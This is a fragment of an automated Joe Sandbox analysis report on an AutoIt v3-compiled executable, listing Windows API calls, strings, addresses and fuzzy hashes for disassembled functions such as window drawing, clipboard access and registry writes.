                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-3360698832
                                                • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                • SetCursor.USER32(00000000), ref: 00430773
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                • SetCursor.USER32(00000000), ref: 00430803
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                • SetCursor.USER32(00000000), ref: 00430833
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                • SetCursor.USER32(00000000), ref: 00430863
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                • SetCursor.USER32(00000000), ref: 00430887
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                Similarity
                                                • API ID: Cursor$Load
                                                • String ID:
                                                • API String ID: 1675784387-0
                                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                APIs
                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                Similarity
                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1582027408-0
                                                • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                Strings
                                                Similarity
                                                • API ID: CloseConnectCreateRegistry
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 3217815495-966354055
                                                • Opcode ID: 7d529682ee5fc17807d9f1869fe525bc37d3a13623003215e7c5094f22c59936
                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                • Opcode Fuzzy Hash: 7d529682ee5fc17807d9f1869fe525bc37d3a13623003215e7c5094f22c59936
                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                • DestroyWindow.USER32(?), ref: 00456746
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                Strings
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                • String ID: ($,$tooltips_class32
                                                • API String ID: 225202481-3320066284
                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                APIs
                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                • CloseClipboard.USER32 ref: 0046DD41
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                • CloseClipboard.USER32 ref: 0046DD99
                                                Similarity
                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                • String ID:
                                                • API String ID: 15083398-0
                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                Strings
                                                Similarity
                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                • String ID: @$AutoIt v3 GUI
                                                • API String ID: 867697134-3359773793
                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: __wcsicoll$__wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                • API String ID: 790654849-32604322
                                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                APIs
                                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                • _fseek.LIBCMT ref: 00452B3B
                                                • __wsplitpath.LIBCMT ref: 00452B9B
                                                • _wcscpy.LIBCMT ref: 00452BB0
                                                • _wcscat.LIBCMT ref: 00452BC5
                                                • __wsplitpath.LIBCMT ref: 00452BEF
                                                • _wcscat.LIBCMT ref: 00452C07
                                                • _wcscat.LIBCMT ref: 00452C1C
                                                • __fread_nolock.LIBCMT ref: 00452C53
                                                • __fread_nolock.LIBCMT ref: 00452C64
                                                • __fread_nolock.LIBCMT ref: 00452C83
                                                • __fread_nolock.LIBCMT ref: 00452C94
                                                • __fread_nolock.LIBCMT ref: 00452CB5
                                                • __fread_nolock.LIBCMT ref: 00452CC6
                                                • __fread_nolock.LIBCMT ref: 00452CD7
                                                • __fread_nolock.LIBCMT ref: 00452CE8
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                • __fread_nolock.LIBCMT ref: 00452D78
                                                Similarity
                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                • String ID:
                                                • API String ID: 2054058615-0
                                                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                Similarity
                                                • API ID: Window
                                                • String ID: 0
                                                • API String ID: 2353593579-4108050209
                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                APIs
                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                Similarity
                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                • String ID:
                                                • API String ID: 1744303182-0
                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                • __mtterm.LIBCMT ref: 00417C34
                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                • API String ID: 4163708885-3819984048
                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                APIs
                                                Similarity
                                                • API ID: __wcsicoll$IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2485277191-404129466
                                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                APIs
                                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                                • GetDesktopWindow.USER32 ref: 0045476F
                                                • GetWindowRect.USER32(00000000), ref: 00454776
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                • GetClientRect.USER32(?,?), ref: 004547D2
                                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                APIs
                                                • _wcslen.LIBCMT ref: 00464B28
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                • _wcslen.LIBCMT ref: 00464C28
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                • _wcslen.LIBCMT ref: 00464CBA
                                                • _wcslen.LIBCMT ref: 00464CD0
                                                • _wcslen.LIBCMT ref: 00464CEF
                                                Similarity
                                                • API ID: _wcslen$Directory$CurrentSystem
                                                • String ID: D
                                                • API String ID: 1914653954-2746444292
                                                • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                APIs
                                                • _wcsncpy.LIBCMT ref: 0045CE39
                                                • __wsplitpath.LIBCMT ref: 0045CE78
                                                • _wcscat.LIBCMT ref: 0045CE8B
                                                • _wcscat.LIBCMT ref: 0045CE9E
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                • _wcscpy.LIBCMT ref: 0045CF61
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                • String ID: *.*
                                                • API String ID: 1153243558-438819550
                                                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                APIs
                                                Similarity
                                                • API ID: __wcsicoll
                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                • API String ID: 3832890014-4202584635
                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                APIs
                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                • GetFocus.USER32 ref: 0046A0DD
                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                Strings
                                                Similarity
                                                • API ID: MessagePost$CtrlFocus
                                                • String ID: 0
                                                • API String ID: 1534620443-4108050209
                                                • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
